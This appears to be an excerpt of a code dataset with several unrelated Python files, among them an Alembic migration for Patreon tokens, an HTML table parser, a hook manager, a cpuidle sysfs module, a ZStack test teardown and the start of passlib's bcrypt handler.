code
stringlengths 1
199k
|
|---|
# Alembic migration identifiers: this revision and the revision it follows.
revision = 'e966a3afd100'
down_revision = '954c3c4caf32'
branch_labels = None
depends_on = None
import alembic
import sqlalchemy
import requests
import pytz
import dateutil.parser
import datetime
def upgrade():
    """Create the ``patreon_users`` table and migrate Patreon OAuth data
    out of per-user columns on ``users`` into it.

    For every user with a stored access token: refresh the token if it
    has expired, query the Patreon API for the account's identity and
    pledge data, insert a row into ``patreon_users``, and point the
    ``users`` row at it via the new ``patreon_user`` foreign key.  The
    old token columns on ``users`` are dropped at the end.
    """
    patreon_users = alembic.op.create_table("patreon_users",
        sqlalchemy.Column("id", sqlalchemy.Integer, primary_key=True),
        sqlalchemy.Column("patreon_id", sqlalchemy.Text, unique=True),
        sqlalchemy.Column("full_name", sqlalchemy.Text, nullable=False),
        sqlalchemy.Column("access_token", sqlalchemy.Text),
        sqlalchemy.Column("refresh_token", sqlalchemy.Text),
        sqlalchemy.Column("token_expires", sqlalchemy.DateTime(timezone=True)),
        sqlalchemy.Column("pledge_start", sqlalchemy.DateTime(timezone=True)),
        sqlalchemy.Column("last_announce_month", sqlalchemy.Integer),
    )
    alembic.op.add_column("users",
        sqlalchemy.Column("patreon_user",
            sqlalchemy.Integer, sqlalchemy.ForeignKey("patreon_users.id", onupdate="CASCADE", ondelete="SET NULL"),
            unique=True,
        )
    )
    # Migrate existing linked accounts from the old users.* token columns.
    conn = alembic.op.get_bind()
    meta = sqlalchemy.MetaData(bind=conn)
    meta.reflect()
    users = meta.tables["users"]
    existing_accounts = conn.execute(sqlalchemy.select([users.c.id, users.c.patreon_access_token, users.c.patreon_refresh_token, users.c.patreon_token_expires])
        .where(users.c.patreon_access_token.isnot(None)))
    all_patreon_users = []
    all_users = []
    # OAuth client credentials come from the app config, not the DB.
    clientid = alembic.context.config.get_section_option('lrrbot', 'patreon_clientid')
    clientsecret = alembic.context.config.get_section_option('lrrbot', 'patreon_clientsecret')
    with requests.Session() as session:
        for user_id, access_token, refresh_token, expires in existing_accounts:
            now = datetime.datetime.now(tz=pytz.utc)
            # Refresh expired tokens before querying the API.
            # NOTE(review): assumes token_expires is non-NULL whenever an
            # access token is stored -- confirm against the old schema.
            if expires < now:
                req = session.post("https://api.patreon.com/oauth2/token", data={
                    'grant_type': 'refresh_token',
                    'client_id': clientid,
                    'client_secret': clientsecret,
                    'refresh_token': refresh_token
                })
                req.raise_for_status()
                data = req.json()
                access_token = data["access_token"]
                refresh_token = data["refresh_token"]
                expires = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=data["expires_in"])
            req = session.get("https://api.patreon.com/oauth2/api/current_user", headers={"Authorization": "Bearer %s" % access_token})
            req.raise_for_status()
            data = req.json()
            user = {
                "patreon_id": data["data"]["id"],
                "full_name": data["data"]["attributes"]["full_name"],
                "access_token": access_token,
                "refresh_token": refresh_token,
                "token_expires": expires,
            }
            if 'pledges' in data["data"].get("relationships", {}):
                # JSON-API format: pledge entries only carry id/type;
                # resolve the full objects from the "included" collection.
                for pledge in data["data"]["relationships"]["pledges"]["data"]:
                    for obj in data["included"]:
                        if obj["id"] == pledge["id"] and obj["type"] == pledge["type"]:
                            user["pledge_start"] = dateutil.parser.parse(obj["attributes"]["created_at"])
            all_patreon_users.append(user)
            all_users.append((user_id, data["data"]["id"]))
    alembic.op.bulk_insert(patreon_users, all_patreon_users)
    # Link each users row to its new patreon_users row (correlated UPDATE).
    for user_id, patreon_id in all_users:
        conn.execute(users.update()
            .values(patreon_user=patreon_users.c.id)
            .where(users.c.id == user_id)
            .where(patreon_users.c.patreon_id == patreon_id)
        )
    alembic.op.drop_column("users", "patreon_access_token")
    alembic.op.drop_column("users", "patreon_refresh_token")
    alembic.op.drop_column("users", "patreon_token_expires")
def downgrade():
    """Revert the Patreon credential split.

    Restores the token columns on ``users``, copies the credential data
    back from ``patreon_users``, then drops the link column and the
    ``patreon_users`` table.
    """
    alembic.op.add_column("users", sqlalchemy.Column("patreon_access_token", sqlalchemy.Text))
    alembic.op.add_column("users", sqlalchemy.Column("patreon_refresh_token", sqlalchemy.Text))
    alembic.op.add_column("users", sqlalchemy.Column("patreon_token_expires", sqlalchemy.DateTime(timezone=True)))
    conn = alembic.op.get_bind()
    meta = sqlalchemy.MetaData(bind=conn)
    meta.reflect()
    users = meta.tables["users"]
    patreon_users = meta.tables["patreon_users"]
    # Bug fix: the original called .values() on the *result* of
    # op.execute() (so the SET clause was never part of the statement)
    # and joined on a nonexistent users.c.patreon_id column -- the FK
    # column created by upgrade() is "patreon_user".
    alembic.op.execute(
        users.update()
        .where(users.c.patreon_user == patreon_users.c.id)
        .values({
            "patreon_access_token": patreon_users.c.access_token,
            "patreon_refresh_token": patreon_users.c.refresh_token,
            "patreon_token_expires": patreon_users.c.token_expires,
        })
    )
    # Bug fix: drop the column this migration actually added.
    alembic.op.drop_column("users", "patreon_user")
    alembic.op.drop_table("patreon_users")
|
import HTMLParser
# Sample AWS EC2 instance-type pricing table (HTML) used as parser input.
# Fixed: six "I/O Performance" cells closed their <span> with a stray
# </sort> tag, and one architecture cell read "32_64-bit" instead of the
# "32/64-bit" used by every other row.
data = '''
<table cellspacing="0" class="table table-bordered table-hover table-condensed" id="data">
<thead>
<tr>
<th class="name">Name</th>
<th class="memory">Memory</th>
<th class="computeunits">
<abbr title="One EC2 Compute Unit provides the equivalent CPU capacity of a 1.0-1.2 GHz 2007 Opteron or 2007 Xeon processor.">Compute Units</abbr>
</th>
<th class="storage">Storage</th>
<th class="architecture">Architecture</th>
<th class="ioperf">I/O Performance</th>
<th class="maxips">
<abbr title="Adding additional IPs requires launching the instance in a VPC.">Max IPs</abbr>
</th>
<th class="apiname">API Name</th>
<th class="cost">Linux cost</th>
<th class="cost">Windows cost</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name">M1 Small</td>
<td class="memory"><span sort="1.7">1.70 GB</span></td>
<td class="computeunits"><span sort="1">1</span></td>
<td class="storage"><span sort="160">160 GB</span></td>
<td class="architecture">32/64-bit</td>
<td class="ioperf"><span sort="1">Moderate</span></td>
<td class="maxips">8</td>
<td class="apiname">m1.small</td>
<td class="cost" hour_cost="0.060">$0.060 per hour</td>
<td class="cost" hour_cost="0.115">$0.115 per hour</td>
</tr>
<tr>
<td class="name">M1 Medium</td>
<td class="memory"><span sort="3.75">3.75 GB</span></td>
<td class="computeunits"><span sort="2">2</span></td>
<td class="storage"><span sort="410">410 GB</span></td>
<td class="architecture">32/64-bit</td>
<td class="ioperf"><span sort="1">Moderate</span></td>
<td class="maxips">12</td>
<td class="apiname">m1.medium</td>
<td class="cost" hour_cost="0.12">$0.12 per hour</td>
<td class="cost" hour_cost="0.23">$0.23 per hour</td>
</tr>
<tr>
<td class="name">M1 Large</td>
<td class="memory"><span sort="7.5">7.50 GB</span></td>
<td class="computeunits"><span sort="4">4</span></td>
<td class="storage"><span sort="850">850 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="3">High</span></td>
<td class="maxips">30</td>
<td class="apiname">m1.large</td>
<td class="cost" hour_cost="0.24">$0.24 per hour</td>
<td class="cost" hour_cost="0.46">$0.46 per hour</td>
</tr>
<tr>
<td class="name">M1 Extra Large</td>
<td class="memory"><span sort="15">15.00 GB</span></td>
<td class="computeunits"><span sort="8">8</span></td>
<td class="storage"><span sort="1690">1690 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="3">High</span></td>
<td class="maxips">60</td>
<td class="apiname">m1.xlarge</td>
<td class="cost" hour_cost="0.48">$0.48 per hour</td>
<td class="cost" hour_cost="0.92">$0.92 per hour</td>
</tr>
<tr>
<td class="name">Micro</td>
<td class="memory"><span sort="0.6">0.60 GB</span></td>
<td class="computeunits"><span sort="2">2</span></td>
<td class="storage"><span sort="0">0 GB</span></td>
<td class="architecture">32/64-bit</td>
<td class="ioperf"><span sort="0">Low</span></td>
<td class="maxips">1</td>
<td class="apiname">t1.micro</td>
<td class="cost" hour_cost="0.02">$0.02 per hour</td>
<td class="cost" hour_cost="0.02">$0.02 per hour</td>
</tr>
<tr>
<td class="name">High-Memory Extra Large</td>
<td class="memory"><span sort="17.10">17.10 GB</span></td>
<td class="computeunits"><span sort="6.5">6.5</span></td>
<td class="storage"><span sort="420">420 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="1">Moderate</span></td>
<td class="maxips">60</td>
<td class="apiname">m2.xlarge</td>
<td class="cost" hour_cost="0.41">$0.41 per hour</td>
<td class="cost" hour_cost="0.57">$0.57 per hour</td>
</tr>
<tr>
<td class="name">High-Memory Double Extra Large</td>
<td class="memory"><span sort="34.2">34.20 GB</span></td>
<td class="computeunits"><span sort="13">13</span></td>
<td class="storage"><span sort="850">850 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="2">High</span></td>
<td class="maxips">120</td>
<td class="apiname">m2.2xlarge</td>
<td class="cost" hour_cost="0.82">$0.82 per hour</td>
<td class="cost" hour_cost="1.14">$1.14 per hour</td>
</tr>
<tr>
<td class="name">High-Memory Quadruple Extra Large</td>
<td class="memory"><span sort="68.4">68.40 GB</span></td>
<td class="computeunits"><span sort="26">26</span></td>
<td class="storage"><span sort="1690">1690 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="3">High</span></td>
<td class="maxips">240</td>
<td class="apiname">m2.4xlarge</td>
<td class="cost" hour_cost="1.64">$1.64 per hour</td>
<td class="cost" hour_cost="2.28">$2.28 per hour</td>
</tr>
<tr>
<td class="name">M3 Extra Large</td>
<td class="memory"><span sort="15">15.00 GB</span></td>
<td class="computeunits"><span sort="13">13</span></td>
<td class="storage"><span sort="0">0 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="1">Moderate</span></td>
<td class="maxips">60</td>
<td class="apiname">m3.xlarge</td>
<td class="cost" hour_cost="0.50">$0.50 per hour</td>
<td class="cost" hour_cost="0.98">$0.98 per hour</td>
</tr>
<tr>
<td class="name">M3 Double Extra Large</td>
<td class="memory"><span sort="30">30.00 GB</span></td>
<td class="computeunits"><span sort="26">26</span></td>
<td class="storage"><span sort="0">0 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="2">High</span></td>
<td class="maxips">120</td>
<td class="apiname">m3.2xlarge</td>
<td class="cost" hour_cost="1.00">$1.00 per hour</td>
<td class="cost" hour_cost="1.96">$1.96 per hour</td>
</tr>
<tr>
<td class="name">High-CPU Medium</td>
<td class="memory"><span sort="1.7">1.70 GB</span></td>
<td class="computeunits"><span sort="5">5</span></td>
<td class="storage"><span sort="350">350 GB</span></td>
<td class="architecture">32/64-bit</td>
<td class="ioperf"><span sort="1">Moderate</span></td>
<td class="maxips">12</td>
<td class="apiname">c1.medium</td>
<td class="cost" hour_cost="0.145">$0.145 per hour</td>
<td class="cost" hour_cost="0.285">$0.285 per hour</td>
</tr>
<tr>
<td class="name">High-CPU Extra Large</td>
<td class="memory"><span sort="7">7.00 GB</span></td>
<td class="computeunits"><span sort="20">20</span></td>
<td class="storage"><span sort="1690">1690 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="2">High</span></td>
<td class="maxips">60</td>
<td class="apiname">c1.xlarge</td>
<td class="cost" hour_cost="0.58">$0.58 per hour</td>
<td class="cost" hour_cost="1.14">$1.14 per hour</td>
</tr>
<tr>
<td class="name">Cluster Compute Quadruple Extra Large</td>
<td class="memory"><span sort="23">23.00 GB</span></td>
<td class="computeunits"><span sort="33.5">33.5</span></td>
<td class="storage"><span sort="1690">1690 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="4">Very High</span></td>
<td class="maxips">1</td>
<td class="apiname">cc1.4xlarge</td>
<td class="cost" hour_cost="1.30">$1.30 per hour</td>
<td class="cost" hour_cost="1.61">$1.61 per hour</td>
</tr>
<tr>
<td class="name">Cluster Compute Eight Extra Large</td>
<td class="memory"><span sort="60.5">60.50 GB</span></td>
<td class="computeunits"><span sort="88">88</span></td>
<td class="storage"><span sort="3370">3370 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="4">Very High</span></td>
<td class="maxips">240</td>
<td class="apiname">cc2.8xlarge</td>
<td class="cost" hour_cost="2.40">$2.40 per hour</td>
<td class="cost" hour_cost="2.97">$2.97 per hour</td>
</tr>
<tr>
<td class="name">Cluster GPU Quadruple Extra Large</td>
<td class="memory"><span sort="22">22.00 GB</span></td>
<td class="computeunits"><span sort="33.5">33.5</span></td>
<td class="storage"><span sort="1690">1690 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="4">Very High</span></td>
<td class="maxips">1</td>
<td class="apiname">cg1.4xlarge</td>
<td class="cost" hour_cost="2.10">$2.10 per hour</td>
<td class="cost" hour_cost="2.60">$2.60 per hour</td>
</tr>
<tr>
<td class="name">High I/O Quadruple Extra Large</td>
<td class="memory"><span sort="60.5">60.50 GB</span></td>
<td class="computeunits"><span sort="35">35</span></td>
<td class="storage"><span sort="2048">2048 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="4">Very High</span></td>
<td class="maxips">1</td>
<td class="apiname">hi1.4xlarge</td>
<td class="cost" hour_cost="3.10">$3.10 per hour</td>
<td class="cost" hour_cost="3.58">$3.58 per hour</td>
</tr>
<tr>
<td class="name">High Storage Eight Extra Large</td>
<td class="memory"><span sort="117.00">117.00 GB</span></td>
<td class="computeunits"><span sort="35">35</span></td>
<td class="storage"><span sort="49152">48 TB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="4">Very High</span></td>
<td class="maxips">1</td>
<td class="apiname">hs1.8xlarge</td>
<td class="cost" hour_cost="4.600">$4.600 per hour</td>
<td class="cost" hour_cost="4.931">$4.931 per hour</td>
</tr>
<tr>
<td class="name">High Memory Cluster Eight Extra Large</td>
<td class="memory"><span sort="244.00">244.00 GB</span></td>
<td class="computeunits"><span sort="88">88</span></td>
<td class="storage"><span sort="240">240 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="4">Very High</span></td>
<td class="maxips">1</td>
<td class="apiname">cr1.8xlarge</td>
<td class="cost" hour_cost="3.500">$3.500 per hour</td>
<td class="cost" hour_cost="3.831">$3.831 per hour</td>
</tr>
</tbody>
</table> '''
class TableParser(HTMLParser.HTMLParser):
    """Collect the text content of every <td> cell into ``self.flavors``."""
    def __init__(self):
        HTMLParser.HTMLParser.__init__(self)
        self.in_td = False  # True while between <td> and </td>
        self.flavors = []   # text chunks gathered from table cells

    def handle_starttag(self, tag, attrs):
        if tag == 'td':
            self.in_td = True

    def handle_data(self, data):
        if self.in_td:
            self.flavors.append(data)

    def handle_endtag(self, tag):
        # Bug fix: only leave "in cell" state on </td>.  Previously *any*
        # end tag (e.g. a nested </span> or </abbr>) reset the flag, so
        # text following a nested element inside the same cell was lost.
        if tag == 'td':
            self.in_td = False
|
import logging
from collections import namedtuple
from see.interfaces import Hook
from see.helpers import lookup_class
# Parameters handed to every Hook at construction time: the environment
# identifier, the hook's merged configuration dict, and the shared context.
HookParameters = namedtuple('HookParameters', ('identifier',
                                               'configuration',
                                               'context'))
def hooks_factory(identifier, configuration, context):
    """
    Returns the initialized hooks.

    Builds a HookManager for *identifier*/*configuration*, loads the
    configured hooks into *context*, and returns the manager.
    """
    hook_manager = HookManager(identifier, configuration)
    hook_manager.load_hooks(context)
    return hook_manager
class HookManager(object):
    """
    The Hooks Manager takes care the Hooks allocation, configuration
    and deallocation.
    """
    def __init__(self, identifier, configuration):
        self.hooks = []
        self.identifier = identifier
        self.configuration = configuration
        self.logger = logging.getLogger(
            '%s.%s' % (self.__module__, self.__class__.__name__))

    def load_hooks(self, context):
        """
        Initializes the Hooks and loads them within the Environment.
        """
        for hook in self.configuration.get('hooks', ()):
            # Bug fix: copy the hook's own settings before merging.
            # hook.get('configuration', {}) returns the dict embedded in
            # the configuration itself; updating it in place leaked the
            # manager-wide settings back into the caller's data structure.
            config = dict(hook.get('configuration', {}))
            config.update(self.configuration.get('configuration', {}))
            try:
                self._load_hook(hook['name'], config, context)
            except KeyError:
                self.logger.exception('Provided hook has no name: %s.', hook)

    def _load_hook(self, name, configuration, context):
        # Instantiate a single hook; failures are logged, not propagated,
        # so one broken hook does not abort loading the rest.
        self.logger.debug('Loading %s hook.', name)
        try:
            HookClass = lookup_hook_class(name)
            hook = HookClass(HookParameters(self.identifier,
                                            configuration,
                                            context))
            self.hooks.append(hook)
        except Exception as error:
            self.logger.exception('Hook %s initialization failure, error: %s.',
                                  name, error)

    def cleanup(self):
        # Give each hook a chance to release resources; NotImplementedError
        # means the hook opted out of cleanup.  Other errors are logged.
        for hook in self.hooks:
            try:
                hook.cleanup()
            except NotImplementedError:
                pass
            except Exception as error:
                self.logger.exception('Hook %s cleanup error: %s.',
                                      hook.__class__.__name__, error)
        self.hooks = []
def lookup_hook_class(name):
    """Resolve *name* to its class and verify it is a Hook subclass.

    Raises ValueError if the resolved class is not a subclass of Hook.
    """
    HookClass = lookup_class(name)
    if not issubclass(HookClass, Hook):
        # Fixed duplicated word ("of of") in the error message.
        raise ValueError("%r is not subclass of %r" % (HookClass, Hook))
    else:
        return HookClass
|
import wlauto.core.signal as signal
from wlauto import Module
from wlauto.exceptions import DeviceError
class CpuidleState(object):
    """A single cpuidle state directory on the target device.

    Attribute values are read from (and written to) the corresponding
    files under the state's sysfs path via the device interface.
    """
    @property
    def usage(self):
        # Value of the state's "usage" sysfs attribute.
        return self.get('usage')

    @property
    def time(self):
        # Value of the state's "time" sysfs attribute.
        return self.get('time')

    @property
    def disable(self):
        # Value of the state's "disable" sysfs attribute.
        return self.get('disable')

    @disable.setter
    def disable(self, value):
        self.set('disable', value)

    @property
    def ordinal(self):
        # Numeric suffix of the state's directory name (e.g. 2 for
        # "state2").  Raises ValueError if the name is entirely digits.
        i = len(self.id)
        # Walk backwards over the trailing digits of the name.
        while self.id[i - 1].isdigit():
            i -= 1
            if not i:
                raise ValueError('invalid idle state name: "{}"'.format(self.id))
        return int(self.id[i:])

    def __init__(self, device, path):
        # *path* is the sysfs directory of this state on *device*; the
        # state id and owning cpu name are derived from the path itself.
        self.device = device
        self.path = path
        self.id = self.device.path.basename(self.path)
        self.cpu = self.device.path.basename(self.device.path.dirname(path))
        # Static descriptive attributes are read once at construction.
        self.desc = self.get('desc')
        self.name = self.get('name')
        self.latency = self.get('latency')
        self.power = self.get('power')

    def get(self, prop):
        # Read the sysfs file *prop* inside this state's directory.
        property_path = self.device.path.join(self.path, prop)
        return self.device.get_sysfile_value(property_path)

    def set(self, prop, value):
        # Write *value* to the sysfs file *prop* inside this state's directory.
        property_path = self.device.path.join(self.path, prop)
        self.device.set_sysfile_value(property_path, value)

    def __eq__(self, other):
        # Compare against another state (name AND desc must match) or
        # against a string (matches either name OR desc).
        # NOTE: uses basestring -- this module is Python 2 code.
        if isinstance(other, CpuidleState):
            return (self.name == other.name) and (self.desc == other.desc)
        elif isinstance(other, basestring):
            return (self.name == other) or (self.desc == other)
        else:
            return False

    def __ne__(self, other):
        return not self.__eq__(other)
class Cpuidle(Module):

    name = 'cpuidle'
    description = """
    Adds cpuidle state query and manupution APIs to a Device interface.
    """
    capabilities = ['cpuidle']

    # Base sysfs directory for the kernel's cpuidle subsystem.
    root_path = '/sys/devices/system/cpu/cpuidle'

    def probe(self, device):
        # The module only applies to devices whose kernel exposes cpuidle.
        return device.file_exists(self.root_path)

    def initialize(self, context):
        self.device = self.root_owner
        # Verify cpuidle support again once the run initializes the device.
        signal.connect(self._on_device_init, signal.RUN_INIT, priority=1)

    def get_cpuidle_driver(self):
        # Contents of the "current_driver" sysfs file, stripped.
        return self.device.get_sysfile_value(self.device.path.join(self.root_path, 'current_driver')).strip()

    def get_cpuidle_governor(self):
        # Contents of the "current_governor_ro" sysfs file, stripped.
        return self.device.get_sysfile_value(self.device.path.join(self.root_path, 'current_governor_ro')).strip()

    def get_cpuidle_states(self, cpu=0):
        # Return a CpuidleState for each state* directory of *cpu*,
        # which may be given as an int index or a name such as "cpu0".
        if isinstance(cpu, int):
            cpu = 'cpu{}'.format(cpu)
        states_dir = self.device.path.join(self.device.path.dirname(self.root_path), cpu, 'cpuidle')
        idle_states = []
        for state in self.device.listdir(states_dir):
            if state.startswith('state'):
                idle_states.append(CpuidleState(self.device, self.device.path.join(states_dir, state)))
        return idle_states

    def _on_device_init(self, context):  # pylint: disable=unused-argument
        if not self.device.file_exists(self.root_path):
            raise DeviceError('Device kernel does not appear to have cpuidle enabled.')
|
'''
Integration Test Teardown case
@author: Youyk
'''
import zstacklib.utils.linux as linux
import zstacklib.utils.http as http
import zstackwoodpecker.setup_actions as setup_actions
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.clean_util as clean_util
import zstackwoodpecker.test_lib as test_lib
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
def test():
    """Tear down the integration-test environment.

    Destroys every VM and stray volume, unmounts primary storage and
    cleans backup storage, removes the test VLAN devices from every
    host, then stops the management node and clears cached host IPs.
    """
    clean_util.cleanup_all_vms_violently()
    clean_util.cleanup_none_vm_volumes_violently()
    clean_util.umount_all_primary_storages_violently()
    clean_util.cleanup_backup_storage()
    hosts = test_lib.lib_get_all_hosts_from_plan()
    # A single-host plan returns a bare object rather than a list.
    if not isinstance(hosts, list):
        hosts = [hosts]
    # Delete both test VLAN devices from every host (previously two
    # copy-pasted loops that mutated a shared command object).
    for vlan_ethname in ['eth0.10', 'eth0.11']:
        cmd = host_plugin.DeleteVlanDeviceCmd()
        cmd.vlan_ethname = vlan_ethname
        for host in hosts:
            http.json_dump_post(testagent.build_http_path(host.managementIp_, host_plugin.DELETE_VLAN_DEVICE_PATH), cmd)
    test_lib.setup_plan.stop_node()
    test_lib.lib_cleanup_host_ip_dict()
    test_util.test_pass('VPC Teardown Success')
|
"""passlib.bcrypt -- implementation of OpenBSD's BCrypt algorithm.
TODO:
* support 2x and altered-2a hashes?
http://www.openwall.com/lists/oss-security/2011/06/27/9
* deal with lack of PY3-compatibile c-ext implementation
"""
from __future__ import with_statement, absolute_import
import os
import re
import logging; log = logging.getLogger(__name__)
from warnings import warn
try:
from bcrypt import hashpw as pybcrypt_hashpw
except ImportError: # pragma: no cover
pybcrypt_hashpw = None
try:
from bcryptor.engine import Engine as bcryptor_engine
except ImportError: # pragma: no cover
bcryptor_engine = None
from passlib.exc import PasslibHashWarning
from passlib.utils import bcrypt64, safe_crypt, repeat_string, \
classproperty, rng, getrandstr, test_crypt
from passlib.utils.compat import bytes, b, u, uascii_to_str, unicode, str_to_uascii
import passlib.utils.handlers as uh
__all__ = [
"bcrypt",
]
# Lazily-imported pure-python bcrypt backend (set by _load_builtin()).
_builtin_bcrypt = None

def _load_builtin():
    # Import the builtin backend on first use only; it is slow, so it is
    # not loaded unless actually selected.
    global _builtin_bcrypt
    if _builtin_bcrypt is None:
        from passlib.utils._blowfish import raw_bcrypt as _builtin_bcrypt
# bcrypt hash identifier prefixes recognized by this handler.
IDENT_2 = u("$2$")
IDENT_2A = u("$2a$")
IDENT_2X = u("$2x$")
IDENT_2Y = u("$2y$")
# NUL byte -- rejected in secrets (see the NullPasswordError checks below).
_BNULL = b('\x00')
class bcrypt(uh.HasManyIdents, uh.HasRounds, uh.HasSalt, uh.HasManyBackends, uh.GenericHandler):
    """This class implements the BCrypt password hash, and follows the :ref:`password-hash-api`.

    It supports a fixed-length salt, and a variable number of rounds.

    The :meth:`~passlib.ifc.PasswordHash.encrypt` and :meth:`~passlib.ifc.PasswordHash.genconfig` methods accept the following optional keywords:

    :type salt: str
    :param salt:
        Optional salt string.
        If not specified, one will be autogenerated (this is recommended).
        If specified, it must be 22 characters, drawn from the regexp range ``[./0-9A-Za-z]``.

    :type rounds: int
    :param rounds:
        Optional number of rounds to use.
        Defaults to 12, must be between 4 and 31, inclusive.
        This value is logarithmic, the actual number of iterations used will be :samp:`2**{rounds}`
        -- increasing the rounds by +1 will double the amount of time taken.

    :type ident: str
    :param ident:
        Specifies which version of the BCrypt algorithm will be used when creating a new hash.
        Typically this option is not needed, as the default (``"2a"``) is usually the correct choice.
        If specified, it must be one of the following:

        * ``"2"`` - the first revision of BCrypt, which suffers from a minor security flaw and is generally not used anymore.
        * ``"2a"`` - latest revision of the official BCrypt algorithm, and the current default.
        * ``"2y"`` - format specific to the *crypt_blowfish* BCrypt implementation,
          identical to ``"2a"`` in all but name.

    :type relaxed: bool
    :param relaxed:
        By default, providing an invalid value for one of the other
        keywords will result in a :exc:`ValueError`. If ``relaxed=True``,
        and the error can be corrected, a :exc:`~passlib.exc.PasslibHashWarning`
        will be issued instead. Correctable errors include ``rounds``
        that are too small or too large, and ``salt`` strings that are too long.

    .. versionadded:: 1.6

    .. versionchanged:: 1.6
        This class now supports ``"2y"`` hashes, and recognizes
        (but does not support) the broken ``"2x"`` hashes.
        (see the :ref:`crypt_blowfish bug <crypt-blowfish-bug>`
        for details).

    .. versionchanged:: 1.6
        Added a pure-python backend.
    """
    #===================================================================
    # class attrs
    #===================================================================
    #--GenericHandler--
    name = "bcrypt"
    setting_kwds = ("salt", "rounds", "ident")
    checksum_size = 31
    checksum_chars = bcrypt64.charmap

    #--HasManyIdents--
    default_ident = u("$2a$")
    ident_values = (u("$2$"), IDENT_2A, IDENT_2X, IDENT_2Y)
    ident_aliases = {u("2"): u("$2$"), u("2a"): IDENT_2A, u("2y"): IDENT_2Y}

    #--HasSalt--
    min_salt_size = max_salt_size = 22
    salt_chars = bcrypt64.charmap
    # NOTE: 22nd salt char must be in bcrypt64._padinfo2[1], not full charmap

    #--HasRounds--
    default_rounds = 12  # current passlib default
    min_rounds = 4  # bcrypt spec specified minimum
    max_rounds = 31  # 32-bit integer limit (since real_rounds=1<<rounds)
    rounds_cost = "log2"

    #===================================================================
    # formatting
    #===================================================================
    @classmethod
    def from_string(cls, hash):
        # Parse "<ident><rounds>$<salt><checksum>" into an instance.
        # Rejects the broken crypt_blowfish "2x" format, and cost fields
        # that are not zero-padded two-digit numbers.
        ident, tail = cls._parse_ident(hash)
        if ident == IDENT_2X:
            raise ValueError("crypt_blowfish's buggy '2x' hashes are not "
                             "currently supported")
        rounds_str, data = tail.split(u("$"))
        rounds = int(rounds_str)
        if rounds_str != u('%02d') % (rounds,):
            raise uh.exc.MalformedHashError(cls, "malformed cost field")
        # first 22 chars are the salt, the remainder (if any) the checksum
        salt, chk = data[:22], data[22:]
        return cls(
            rounds=rounds,
            salt=salt,
            checksum=chk or None,
            ident=ident,
        )

    def to_string(self):
        # Render this instance back into "<ident><rounds>$<salt><checksum>".
        hash = u("%s%02d$%s%s") % (self.ident, self.rounds, self.salt,
                                   self.checksum or u(''))
        return uascii_to_str(hash)

    def _get_config(self, ident=None):
        "internal helper to prepare config string for backends"
        if ident is None:
            ident = self.ident
        if ident == IDENT_2Y:
            # "2y" is identical to "2a" in everything but name, and the
            # backends only speak "2a".
            ident = IDENT_2A
        else:
            assert ident != IDENT_2X
        config = u("%s%02d$%s") % (ident, self.rounds, self.salt)
        return uascii_to_str(config)

    #===================================================================
    # specialized salt generation - fixes passlib issue 25
    #===================================================================
    @classmethod
    def _bind_needs_update(cls, **settings):
        # hash-migration hook: delegate to _needs_update for all settings.
        return cls._needs_update

    @classmethod
    def _needs_update(cls, hash, secret):
        if isinstance(hash, bytes):
            hash = hash.decode("ascii")
        # check for incorrect padding bits (passlib issue 25)
        if hash.startswith(IDENT_2A) and hash[28] not in bcrypt64._padinfo2[1]:
            return True
        # TODO: try to detect incorrect $2x$ hashes using *secret*
        return False

    @classmethod
    def normhash(cls, hash):
        "helper to normalize hash, correcting any bcrypt padding bits"
        if cls.identify(hash):
            return cls.from_string(hash).to_string()
        else:
            return hash

    def _generate_salt(self, salt_size):
        # override to correct generate salt bits
        salt = super(bcrypt, self)._generate_salt(salt_size)
        return bcrypt64.repair_unused(salt)

    def _norm_salt(self, salt, **kwds):
        salt = super(bcrypt, self)._norm_salt(salt, **kwds)
        assert salt is not None, "HasSalt didn't generate new salt!"
        changed, salt = bcrypt64.check_repair_unused(salt)
        if changed:
            # FIXME: if salt was provided by user, this message won't be
            # correct. not sure if we want to throw error, or use different warning.
            warn(
                "encountered a bcrypt salt with incorrectly set padding bits; "
                "you may want to use bcrypt.normhash() "
                "to fix this; see Passlib 1.5.3 changelog.",
                PasslibHashWarning)
        return salt

    def _norm_checksum(self, checksum):
        checksum = super(bcrypt, self)._norm_checksum(checksum)
        if not checksum:
            return None
        changed, checksum = bcrypt64.check_repair_unused(checksum)
        if changed:
            warn(
                "encountered a bcrypt hash with incorrectly set padding bits; "
                "you may want to use bcrypt.normhash() "
                "to fix this; see Passlib 1.5.3 changelog.",
                PasslibHashWarning)
        return checksum

    #===================================================================
    # primary interface
    #===================================================================
    # candidate backends, in order of preference.
    backends = ("pybcrypt", "bcryptor", "os_crypt", "builtin")

    @classproperty
    def _has_backend_pybcrypt(cls):
        # available if py-bcrypt's hashpw() imported successfully above.
        return pybcrypt_hashpw is not None

    @classproperty
    def _has_backend_bcryptor(cls):
        # available if bcryptor's Engine imported successfully above.
        return bcryptor_engine is not None

    @classproperty
    def _has_backend_builtin(cls):
        # the (slow) pure-python backend must be opted into via env var.
        if os.environ.get("PASSLIB_BUILTIN_BCRYPT") not in ["enable","enabled"]:
            return False
        # look at it cross-eyed, and it loads itself
        _load_builtin()
        return True

    @classproperty
    def _has_backend_os_crypt(cls):
        # probe crypt(3) with known $2$ and $2a$ test vectors.
        # XXX: what to do if only h2 is supported? h1 is *very* rare.
        h1 = '$2$04$......................1O4gOrCYaqBG3o/4LnT2ykQUt1wbyju'
